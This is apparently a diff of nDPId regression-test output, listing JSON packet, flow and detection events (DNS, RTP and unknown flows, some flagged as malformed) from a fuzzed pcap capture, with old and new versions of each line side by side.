00414{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":612,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":86,"pkt_l4_len":0,"thread_ts_msec":1120470971822,"pkt":"ADBUADRWAODtAW69CABFAGVIa\/AAAIARS2HAqAECwKgBAQr+ADUANOrBPwUBAAABAAAACAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} 00400{"packet_event_id":1,"packet_event_name":"packet","packet_id":612,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":86,"pkt_l4_len":0,"thread_ts_msec":1120470971822,"pkt":"ADBUADRWAODtAW69CABFAGVIa\/AAAIARS2HAqAECwKgBAQr+ADUANOrBPwUBAAABAAAACAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="}
00230{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":612,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":52,"global_ts_msec":1120470971852} 00216{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":612,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":52,"global_ts_msec":1120470971852}
00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":614,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":220,"flow_packet_id":2,"flow_last_seen":1120470975858,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470975858,"pkt":"ADBUADRWAODtAW69CABFAABIa\/IAAIARS1\/AqAECwKgBAQr+ADUANOrBPwUBAAABAAAAAAAABF9zaWIEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} 00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":614,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":220,"flow_packet_id":2,"flow_last_seen":1120470975858,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470975858,"pkt":"ADBUADRWAODtAW69CABFAABIa\/IAAIARS1\/AqAECwKgBAQr+ADUANOrBPwUBAAABAAAAAAAABF9zaWIEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="}
00919{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":614,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":220,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470966852,"flow_last_seen":1120470975858,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470975858,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2814,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sib._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00919{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":614,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":220,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470966852,"flow_last_seen":1120470975858,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470975858,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2814,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sib._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
00618{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":615,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":188,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470781608,"flow_last_seen":1120470781608,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120470975858,"l3_proto":"ip4","src_ip":"192.168.170.170","dst_ip":"170.170.170.170","src_port":43690,"dst_port":43690,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00618{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":615,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":188,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470781608,"flow_last_seen":1120470781608,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120470975858,"l3_proto":"ip4","src_ip":"192.168.170.170","dst_ip":"170.170.170.170","src_port":43690,"dst_port":43690,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
@@ -1198,8 +1198,8 @@
00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":615,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":222,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470983860,"flow_last_seen":1120470983860,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470983860,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2815,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":615,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":222,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470983860,"flow_last_seen":1120470983860,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470983860,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2815,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00506{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":615,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":222,"flow_packet_id":1,"flow_last_seen":1120470983860,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1120470983860,"pkt":"ADBUADRWAODtAW69CABFAABEa\/cAAIARS17AqAECwKgBAQr\/ADUAMJu6iQWqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqg=="} 00506{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":615,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":222,"flow_packet_id":1,"flow_last_seen":1120470983860,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1120470983860,"pkt":"ADBUADRWAODtAW69CABFAABEa\/cAAIARS17AqAECwKgBAQr\/ADUAMJu6iQWqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqg=="}
00878{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":615,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":222,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470983860,"flow_last_seen":1120470983860,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470983860,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2815,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":170,"num_answers":254,"reply_code":10,"query_type":0,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00878{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":615,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":222,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470983860,"flow_last_seen":1120470983860,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470983860,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2815,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":170,"num_answers":254,"reply_code":10,"query_type":0,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
00439{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":616,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":105,"pkt_l4_len":0,"thread_ts_msec":1120470983860,"pkt":"AODtam69ADBUADRWCABFAABLAABcAEARtz7AqAEBhagBAgA1Cv8AR342iQWAAAABAAEAAAAAATEBMAEwAzEyNwdpbi1hZGRyBGFycGEAAAwAAcAMAAwAAQAAJxAACwlsb2NhbGhvc3QA"} 00425{"packet_event_id":1,"packet_event_name":"packet","packet_id":616,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":105,"pkt_l4_len":0,"thread_ts_msec":1120470983860,"pkt":"AODtam69ADBUADRWCABFAABLAABcAEARtz7AqAEBhagBAgA1Cv8AR342iQWAAAABAAEAAAAAATEBMAEwAzEyNwdpbi1hZGRyBGFycGEAAAwAAcAMAAwAAQAAJxAACwlsb2NhbGhvc3QA"}
00230{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":616,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":71,"global_ts_msec":1120470983861} 00216{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":616,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":71,"global_ts_msec":1120470983861}
00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":618,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":223,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470983999,"flow_last_seen":1120470983999,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470983999,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2816,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":618,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":223,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470983999,"flow_last_seen":1120470983999,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470983999,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2816,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":618,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":223,"flow_packet_id":1,"flow_last_seen":1120470983999,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470983999,"pkt":"ADBUADRWAODtAW69CABFAABIa\/kAAIARS1jAqAECwKgBAQsAADUANFW+1AYBAAABAAAAAAAABOxzaXAEX3VkcANzaHAJY3liZXJjaXR5AmRrAAAhAAE="} 00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":618,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":223,"flow_packet_id":1,"flow_last_seen":1120470983999,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470983999,"pkt":"ADBUADRWAODtAW69CABFAABIa\/kAAIARS1jAqAECwKgBAQsAADUANFW+1AYBAAABAAAAAAAABOxzaXAEX3VkcANzaHAJY3liZXJjaXR5AmRrAAAhAAE="}
00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":618,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":223,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470983999,"flow_last_seen":1120470983999,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470983999,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2816,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"?sip._udp.shp.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":618,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":223,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470983999,"flow_last_seen":1120470983999,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470983999,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2816,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"?sip._udp.shp.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
@@ -1225,12 +1225,12 @@
00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":632,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":229,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470985511,"flow_last_seen":1120470985511,"flow_idle_time":180000,"flow_min_l4_payload_len":172,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":172,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1120470985511,"l3_proto":"ip4","src_ip":"81.168.1.2","dst_ip":"212.242.33.36","src_port":30000,"dst_port":40392,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":632,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":229,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470985511,"flow_last_seen":1120470985511,"flow_idle_time":180000,"flow_min_l4_payload_len":172,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":172,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1120470985511,"l3_proto":"ip4","src_ip":"81.168.1.2","dst_ip":"212.242.33.36","src_port":30000,"dst_port":40392,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00687{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":632,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":229,"flow_packet_id":1,"flow_last_seen":1120470985511,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1120470985511,"pkt":"ADBUADRWAODtAb+9CABFAADIbAQAAIARFm9RqAEC1PIhJHUwncgAtIfqgAhvtgAACdg3lstxlpDplp2cmZ6fkpaRle3n9PTy\/CVzAJKehIeEmJGRl52QlJaX6OOU6JaRlp2cn4WEhZ2RkJeV6WOQnZ6EhJOFh4WFmYWYk7+dkpCQ6u\/qkZ2fmYSYnZ6Rk5OU7OD6+Pbh4PTl+OTo6unl9eXi7f7c1VT\/+uiX6JSUkJCV7uXm\/Obu7pWWkZeW7OPpk5Ofm5+Yk5WV7untlJeSkpeV7+qWkA=="} 00687{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":632,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":229,"flow_packet_id":1,"flow_last_seen":1120470985511,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1120470985511,"pkt":"ADBUADRWAODtAb+9CABFAADIbAQAAIARFm9RqAEC1PIhJHUwncgAtIfqgAhvtgAACdg3lstxlpDplp2cmZ6fkpaRle3n9PTy\/CVzAJKehIeEmJGRl52QlJaX6OOU6JaRlp2cn4WEhZ2RkJeV6WOQnZ6EhJOFh4WFmYWYk7+dkpCQ6u\/qkZ2fmYSYnZ6Rk5OU7OD6+Pbh4PTl+OTo6unl9eXi7f7c1VT\/+uiX6JSUkJCV7uXm\/Obu7pWWkZeW7OPpk5Ofm5+Yk5WV7untlJeSkpeV7+qWkA=="}
00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":632,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":229,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470985511,"flow_last_seen":1120470985511,"flow_idle_time":180000,"flow_min_l4_payload_len":172,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":172,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1120470985511,"l3_proto":"ip4","src_ip":"81.168.1.2","dst_ip":"212.242.33.36","src_port":30000,"dst_port":40392,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"RTP","breed":"Acceptable","category":"Media"}} 00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":632,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":229,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470985511,"flow_last_seen":1120470985511,"flow_idle_time":180000,"flow_min_l4_payload_len":172,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":172,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1120470985511,"l3_proto":"ip4","src_ip":"81.168.1.2","dst_ip":"212.242.33.36","src_port":30000,"dst_port":40392,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"RTP","breed":"Acceptable","category":"Media"}}
00496{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":633,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":146,"pkt_type":20992,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":146,"pkt_l4_len":0,"thread_ts_msec":1120470985511,"pkt":"ADBUADRWAODtAW69UgBFAACEbAVoAIARFqPAqAEC9PIhJHUxnckAcCyBgMgABjeWy3FCyQfKXvrGAwAAJMMAAAAJAAAGDIHKAAs3lstxAR0xMTg5NDI5Ny00NDMyYTlmOEAxOTIuMTY4LjEuMgYFU0lQUFMAAIHLAAY3lstxEHNlc3Npb24gc2h1dGRvd24AAAE="} 00482{"packet_event_id":1,"packet_event_name":"packet","packet_id":633,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":146,"pkt_type":20992,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":146,"pkt_l4_len":0,"thread_ts_msec":1120470985511,"pkt":"ADBUADRWAODtAW69UgBFAACEbAVoAIARFqPAqAEC9PIhJHUxnckAcCyBgMgABjeWy3FCyQfKXvrGAwAAJMMAAAAJAAAGDIHKAAs3lstxAR0xMTg5NDI5Ny00NDMyYTlmOEAxOTIuMTY4LjEuMgYFU0lQUFMAAIHLAAY3lstxEHNlc3Npb24gc2h1dGRvd24AAAE="}
00213{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":633,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","layer_type":20992,"global_ts_msec":1120470986363} 00199{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":633,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","layer_type":20992,"global_ts_msec":1120470986363}
00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":634,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":223,"flow_packet_id":3,"flow_last_seen":1120470987237,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470987237,"pkt":"ADBUADRWAODtAW69CABFAABIbAYAAIARS0vAqAECwKgBAQsAADUANFW+1AYBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaVR5AmRrAAAhAAE="} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":634,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":223,"flow_packet_id":3,"flow_last_seen":1120470987237,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470987237,"pkt":"ADBUADRWAODtAW69CABFAABIbAYAAIARS0vAqAECwKgBAQsAADUANFW+1AYBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaVR5AmRrAAAhAAE="}
00800{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":634,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":223,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120470983999,"flow_last_seen":1120470987237,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470987237,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2816,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00800{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":634,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":223,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120470983999,"flow_last_seen":1120470987237,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470987237,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2816,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
00413{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":635,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":86,"pkt_l4_len":0,"thread_ts_msec":1120470987237,"pkt":"ADBUADRWAODtAW69CABFAABIbAdtAIARS07AqAECwKgBAQsAADUANFW+1AYBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaVN5AmRrAAAhAAE="} 00399{"packet_event_id":1,"packet_event_name":"packet","packet_id":635,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":86,"pkt_l4_len":0,"thread_ts_msec":1120470987237,"pkt":"ADBUADRWAODtAW69CABFAABIbAdtAIARS07AqAECwKgBAQsAADUANFW+1AYBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaVN5AmRrAAAhAAE="}
00230{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":635,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":52,"global_ts_msec":1120470989238} 00216{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":635,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":52,"global_ts_msec":1120470989238}
00602{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":637,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":196,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470819393,"flow_last_seen":1120470819393,"flow_idle_time":180000,"flow_min_l4_payload_len":9,"flow_max_l4_payload_len":9,"flow_tot_l4_payload_len":9,"flow_avg_l4_payload_len":9,"midstream":0,"thread_ts_msec":1120470993243,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2800,"dst_port":21,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00602{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":637,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":196,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470819393,"flow_last_seen":1120470819393,"flow_idle_time":180000,"flow_min_l4_payload_len":9,"flow_max_l4_payload_len":9,"flow_tot_l4_payload_len":9,"flow_avg_l4_payload_len":9,"midstream":0,"thread_ts_msec":1120470993243,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2800,"dst_port":21,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
